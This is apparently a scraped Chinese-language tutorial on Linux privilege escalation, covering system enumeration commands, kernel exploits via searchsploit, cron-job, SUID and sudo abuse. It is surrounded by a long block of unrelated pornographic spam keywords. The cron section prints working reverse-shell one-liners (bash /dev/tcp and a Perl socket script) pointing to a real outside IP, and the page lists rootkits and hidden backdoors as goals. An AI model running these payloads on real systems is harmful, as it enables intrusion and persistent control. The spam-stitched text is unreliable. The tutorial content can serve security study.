gmnon.cn-疯狂蹂躏欧美一区二区精品,欧美精品久久久久a,高清在线视频日韩欧美,日韩免费av一区二区

站長資訊網(wǎng)
最全最豐富的資訊網(wǎng)站

linux提權(quán)是什么意思

提權(quán)指的是低權(quán)限用戶利用各種合法的或非法的手段獲取到了高于本用戶的系統(tǒng)權(quán)限;Linux提權(quán)一般是指獲取root用戶權(quán)限的操作過程。Linux提權(quán)的本質(zhì)一方面是信息收集,另一方面是對內(nèi)核漏洞的掌握情況;提權(quán)是否成功的關(guān)鍵是信息收集是否完整。

linux提權(quán)是什么意思

本教程操作環(huán)境:linux7.3系統(tǒng)、Dell G3電腦。

linux提權(quán)概念介紹

提權(quán)是什么

提權(quán)指的是低權(quán)限用戶利用各種合法的或非法的手段獲取到了高于本用戶的系統(tǒng)權(quán)限。

詳細(xì)來說,就是指利用操作系統(tǒng)或應(yīng)用軟件中的程序漏洞、設(shè)計缺陷或配置疏忽來獲取對應(yīng)用程序或用戶來說受保護(hù)資源的高級訪問權(quán)限。其結(jié)果是,應(yīng)用程序可以獲取比應(yīng)用程序開發(fā)者或系統(tǒng)管理員預(yù)期的更高的特權(quán),從而可以執(zhí)行授權(quán)的動作。

Linux提權(quán)一般是指獲取root用戶權(quán)限的操作過程。

Linux提權(quán)目的

提權(quán)操作有風(fēng)險為什么還要進(jìn)行提權(quán)?什么情況下需要進(jìn)行提權(quán)?獲取高權(quán)限之后可以做什么?

通過命令執(zhí)行漏洞獲取的一個反彈shell或是通過Web漏洞獲取了一個Webshell后,一般情況下權(quán)限都較低。在執(zhí)行一些重要敏感的操作或是對重要的文件進(jìn)行修改時無法正常進(jìn)行,便需要進(jìn)行提權(quán)。Linux中安裝的數(shù)據(jù)庫、中間件等一般都不是以root用戶啟動的,通過數(shù)據(jù)庫或是中間件獲取到的權(quán)限是是低權(quán)限的。

獲取一個root權(quán)限是每一個黑客的夢想。

  • 讀取寫入服務(wù)器中的重要文件:
    • 修改root密碼
    • 替換系統(tǒng)命令
  • 在系統(tǒng)中放置更為隱蔽的后門:
    • ping后門
    • Rootkit
  • 保證服務(wù)器重啟之后權(quán)限仍在:
    • 內(nèi)存后門

Linux提權(quán)本質(zhì)

Linux提權(quán)的本質(zhì)一方面是信息收集,另一方面是對內(nèi)核漏洞的掌握情況。

Linux信息收集

任何提權(quán)的第一步操作一定是對操作系統(tǒng)進(jìn)行信息收集。提權(quán)是否成功的關(guān)鍵是信息收集是否完整。

  • 內(nèi)核設(shè)備信息:

    • uname -a 打印所有可用的系統(tǒng)信息
    • uname -r 內(nèi)核版本
    • uname -n 系統(tǒng)主機(jī)名。
    • uname -m 查看系統(tǒng)內(nèi)核架構(gòu)(64位/32位)
    • hostname 系統(tǒng)主機(jī)名
    • cat /proc/version 內(nèi)核信息
    • cat /etc/*-release 分發(fā)信息
    • cat /etc/issue 分發(fā)信息
    • cat /proc/cpuinfo CPU信息
  • 用戶和群組信息:

    • cat /etc/passwd 列出系統(tǒng)上的所有用戶
    • cat /etc/group 列出系統(tǒng)上的所有組
    • grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超級用戶賬戶
    • whoami 查看當(dāng)前用戶
    • w 誰目前已登錄,他們正在做什么
    • last 最后登錄用戶的列表
    • lastlog 所有用戶上次登錄的信息
    • lastlog -u %username% 有關(guān)指定用戶上次登錄的信息
    • lastlog |grep -v "Never" 以前登錄用戶的信息
  • 用戶和權(quán)限信息:

    • whoami 當(dāng)前用戶名
    • id 當(dāng)前用戶信息
    • cat /etc/sudoers 誰被允許以root身份執(zhí)行
    • sudo -l 當(dāng)前用戶可以以root身份執(zhí)行操作
  • 環(huán)境系統(tǒng)變量信息:

    • env 顯示環(huán)境變量
    • set 現(xiàn)實(shí)環(huán)境變量
    • echo %PATH 路徑信息
    • history 顯示當(dāng)前用戶的歷史命令記錄
    • pwd 輸出工作目錄
    • cat /etc/profile 顯示默認(rèn)系統(tǒng)變量
    • cat /etc/shells 顯示可用的shell

內(nèi)核漏洞提權(quán)

內(nèi)核漏洞提權(quán)指的是普通用戶訪問操作系統(tǒng)內(nèi)核,利用內(nèi)核漏洞將權(quán)限提高為root權(quán)限,一般首先需要知曉操作系統(tǒng)的內(nèi)核,內(nèi)核的版本等信息,再尋找內(nèi)核漏洞的EXP進(jìn)行提權(quán)

linux常用查看系統(tǒng)信息命令  uname -a 查看系統(tǒng)全部信息 uname -r 查看內(nèi)核版本 cat /proc/version 查看內(nèi)核信息 cat /etc/*-realease 查看CentOS版本 cat /etc/issue 查看Ubuntu版本 cat /etc/redhat-release 查看RedHat版本 env 查看環(huán)境變量 echo $PATH 查看當(dāng)前環(huán)境變量 awk -F: '($3==0){print $1}' /etc/passwd 查找UID為0的用戶 find / -user root -perm -4000 -exec ls -ldb {} ;  查找設(shè)置了SUID的文件
登錄后復(fù)制

例子:

1)查看系統(tǒng)的內(nèi)核版本

linux提權(quán)是什么意思

2)使用kali的searchsploit尋找對應(yīng)的內(nèi)核漏洞或網(wǎng)上尋找相應(yīng)的內(nèi)核漏洞

linux提權(quán)是什么意思

3)使用gcc將C語言程序編譯成可執(zhí)行文件,上傳至靶機(jī),執(zhí)行即可提權(quán)至root權(quán)限

Linux其他提權(quán)方法

1、計劃任務(wù)提權(quán)

利用原理:

  • 當(dāng) /bin/sh指向/bin/dash的時候(ubuntu默認(rèn)這樣,當(dāng)前的靶機(jī)也是這樣),反彈shell用bash的話得這樣彈: * * * * * root bash -c "bash -i >&/dev/tcp/106.13.124.93/2333 0>&1"
    這樣彈shell的時候不知道為什么很慢,耐心等等
  • */1 * * * * root perl -e 'use Socket;(i="106.13.124.93";)p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in((p,inet_aton()i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2、利用SUID提權(quán)

  • SUID概念:SUID(設(shè)置用戶ID)是賦予文件的一種權(quán)限,它會出現(xiàn)在文件擁有者權(quán)限的執(zhí)行位上,具有這種權(quán)限的文件會在其執(zhí)行時,使調(diào)用者暫時獲得該文件擁有者的權(quán)限。SUID可以讓調(diào)用者以文件擁有者的身份運(yùn)行該文件,所以我們利用SUID提權(quán)的思路就是運(yùn)行root用戶所擁有的SUID的文件,那么我們運(yùn)行該文件的時候就得獲得root用戶的身份了。那么,為什么要給Linux二進(jìn)制文件設(shè)置這種權(quán)限呢?其實(shí)原因有很多,例如,程序ping需要root權(quán)限才能打開網(wǎng)絡(luò)套接字,但執(zhí)行該程序的用戶通常都是由普通用戶,來驗(yàn)證與其他主機(jī)的連通性。

  • SUID提權(quán):什么是suid提權(quán)呢?一個文件,它有s標(biāo)志,并且他輸入root,那么我們運(yùn)行這個程序就可以有了root的權(quán)限,并且這個程序還得能執(zhí)行命令,那么我們就能從普通用戶提升到了root權(quán)限了。

  • 在本地查找符合條件的文件。

    • find / -user root -perm -4000 -print 2>/dev/null
    • find / -perm -u=s -type f 2>/dev/null
    • find / -user root -perm -4000 -exec ls -ldb {} ;
  • 常見的可以提權(quán)的程序

    • nmap vim find Bash More Less Nano cp netcat

3、利用SUDO提權(quán)

Linux系統(tǒng)中可以使用sudo執(zhí)行一個只有root才能執(zhí)行的命令,配置文件保存在/etc/sudoers,sudo -l可以列出當(dāng)前用戶支持sudo的命令。

盡量從代碼層面進(jìn)行對漏洞的分析。

4、環(huán)境變量提權(quán)

  • 查看當(dāng)前環(huán)境變量:

    • echo $PATH

5、root權(quán)限運(yùn)行的服務(wù)

  • 以root的運(yùn)行的服務(wù),其中包括第三方軟件都可以進(jìn)行提權(quán)。

贊(0)
分享到: 更多 (0)
網(wǎng)站地圖   滬ICP備18035694號-2    滬公網(wǎng)安備31011702889846號
gmnon.cn-疯狂蹂躏欧美一区二区精品,欧美精品久久久久a,高清在线视频日韩欧美,日韩免费av一区二区
国产xxxx振车| 99er在线视频| 日韩欧美在线免费观看视频| 大片在线观看网站免费收看| 婷婷激情5月天| 亚洲涩涩在线观看| 粉色视频免费看| 五月天婷婷亚洲| 15—17女人毛片| 久久久久xxxx| 天天色天天综合网| 婷婷中文字幕在线观看| 日本一二三四区视频| 成年人网站av| 日韩精品福利片午夜免费观看| 99热一区二区三区| 加勒比海盗1在线观看免费国语版| 成人黄色片免费| 97视频在线免费| 久久久久久久久久网| 欧美亚洲另类色图| 中文字幕 91| 天堂av在线中文| www.中文字幕在线| 中文字幕天天干| 久久久精品视频国产| 欧美一级欧美一级| 十八禁视频网站在线观看| 日本人视频jizz页码69| 污网站在线免费| 成人黄色大片网站| 最近免费中文字幕中文高清百度| 精品久久久噜噜噜噜久久图片| 免费在线观看日韩视频| 日本免费观看网站| 欧美黑人在线观看| 18岁视频在线观看| 国产精品久久久影院| 无码精品国产一区二区三区免费| 一级黄色片国产| 妞干网在线观看视频| 一二三级黄色片| www.中文字幕在线| 永久免费看av| 高清av免费看| 黄色片视频在线免费观看| www.久久久久久久久久久| 国产91在线免费| 警花观音坐莲激情销魂小说| 四虎永久在线精品无码视频| 女女同性女同一区二区三区按摩| 337p粉嫩大胆噜噜噜鲁| 国产精品久久成人免费观看| 精品久久久久久中文字幕2017| 国产专区在线视频| 久久精品国产露脸对白| 欧美视频第三页| 欧美爱爱视频免费看| 精品日韩在线播放| 国产黑丝在线视频| 中文字幕成人在线视频| 手机看片福利日韩| 成人在线观看黄| 农村妇女精品一二区| 国产视频九色蝌蚪| 欧美,日韩,国产在线| 国产传媒久久久| 国产爆乳无码一区二区麻豆| 欧美大片免费播放| 亚洲区成人777777精品| 天天爱天天做天天操| 熟女熟妇伦久久影院毛片一区二区| 99热这里只有精品在线播放| www.com黄色片| 制服丝袜中文字幕第一页| 欧美在线aaa| www.久久com| 337p亚洲精品色噜噜狠狠p| 蜜臀av性久久久久蜜臀av| 日本阿v视频在线观看| 精品成在人线av无码免费看| 欧美日韩不卡在线视频| 亚洲 欧美 日韩 国产综合 在线| www.av91| 欧美大尺度做爰床戏| 中文字幕视频三区| 佐佐木明希av| 免费毛片网站在线观看| 国产又黄又大又粗视频| 小明看看成人免费视频| 蜜臀av性久久久久蜜臀av| 内射国产内射夫妻免费频道| 四季av一区二区| 一级全黄肉体裸体全过程| 拔插拔插海外华人免费| 一区二区在线播放视频| 一级网站在线观看| 北条麻妃69av| 国产探花在线看| 国产精品久久中文字幕| 黄色一级二级三级| 男女裸体影院高潮| 热久久精品国产| 蜜桃视频一区二区在线观看| 日韩精品一区二区三区色欲av| 欧美女同在线观看| 能在线观看的av| 麻豆中文字幕在线观看| 国产l精品国产亚洲区久久| 日日噜噜噜夜夜爽爽| 红桃av在线播放| 欧美少妇一区二区三区| www.涩涩涩| 高清在线观看免费| 久久久久久久久久久综合| 天天爽人人爽夜夜爽| 草草视频在线免费观看| 三年中国中文在线观看免费播放| 成人观看免费完整观看| 天堂а√在线中文在线| 911福利视频| 日韩一级片播放| 黑人糟蹋人妻hd中文字幕| 青青草视频在线视频| 在线播放 亚洲| 亚洲综合av在线播放| 久久精品免费一区二区| 国产欧美久久久久| 青草全福视在线| 日本特级黄色大片| 99精品视频免费版的特色功能| 女性隐私黄www网站视频| 每日在线更新av| 国产美女网站在线观看| 国产aaa免费视频| 青草青青在线视频| 久久99久久99精品| 男女视频网站在线观看| 国产日韩av网站| 凹凸国产熟女精品视频| jizzjizz国产精品喷水| 欧美日韩一道本| 欧美激情精品久久久久久小说| 免费在线观看日韩视频| 国产亚洲天堂网| 无需播放器的av| 色天使在线观看| 久久久久免费精品| 亚洲欧洲日产国码无码久久99 | 中文字幕日韩综合| 欧美精品在欧美一区二区| 亚洲制服中文字幕| 中文av一区二区三区| 免费看涩涩视频| 日韩欧美亚洲另类| 国产5g成人5g天天爽| 国产探花在线观看视频| 亚洲国产精品影视| 成人在线观看毛片| 成年人深夜视频| 免费观看国产精品视频| 97在线播放视频| www.色欧美| 国产 欧美 日本| 男人添女荫道口女人有什么感觉| 草草视频在线免费观看| 日本精品久久久久久久久久| 精品久久一二三| 欧美激情国产精品日韩| 日本中文字幕在线不卡| 北条麻妃在线视频观看| 妞干网在线免费视频| 毛片av免费在线观看| 亚洲性生活网站| www.在线观看av| 国产一级片自拍| 国产一区二区视频播放| 国产精品久久a| 少妇av一区二区三区无码| 污版视频在线观看| 无码 制服 丝袜 国产 另类| 污污的视频免费观看| 日韩人妻无码精品久久久不卡| 99九九99九九九99九他书对| 免费毛片网站在线观看| 日韩 欧美 自拍| 污污的视频免费观看| 天天干在线影院| 国产aaa一级片| 久久久久久www| 日本免费成人网| 视频一区二区视频| 嫩草视频免费在线观看| 成人小视频在线看| 欧美日本视频在线观看| 一二三在线视频| 特大黑人娇小亚洲女mp4| 超碰91在线播放| 可以看污的网站| 中文字幕资源在线观看|